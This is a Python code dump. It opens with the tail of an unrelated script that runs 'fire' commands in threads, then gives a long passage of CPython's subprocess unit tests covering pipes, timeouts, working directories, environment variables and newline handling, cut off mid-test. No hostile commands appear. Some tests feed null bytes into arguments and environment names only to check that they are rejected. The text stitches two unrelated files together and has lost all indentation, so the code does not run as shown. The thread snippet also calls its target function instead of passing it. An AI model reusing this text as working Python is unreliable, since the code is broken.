fire.Fire(Root, command)
pass
# fire_task(cmd)
t = threading.Thread(name='fire_' + str(uuid.uuid4()), target=fire_task(cmd))
fire_threads.append(t)
t.start()
# t.join()
pass
if __name__ == "__main__":
main()
|
test_subprocess.py
|
import unittest
from unittest import mock
from test import support
import subprocess
import sys
import platform
import signal
import io
import os
import errno
import tempfile
import time
import selectors
import sysconfig
import select
import shutil
import gc
import textwrap
try:
import ctypes
except ImportError:
ctypes = None
else:
import ctypes.util
try:
import threading
except ImportError:
threading = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
self.doCleanups()
support.reap_children()
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises((FileNotFoundError, PermissionError),
self._assert_python, pre_args,
executable="doesnotexist")
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
class _PathLikeObj:
def __fspath__(self):
return temp_dir
self._assert_cwd(temp_dir, sys.executable, cwd=_PathLikeObj())
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertStderrEqual(stdout, b'42')
self.assertStderrEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the enviroment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# null character in the enviroment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# equal character in the enviroment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# equal character in the enviroment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
def test_universal_newlines(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen([sys.executable, "-c", "pass"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
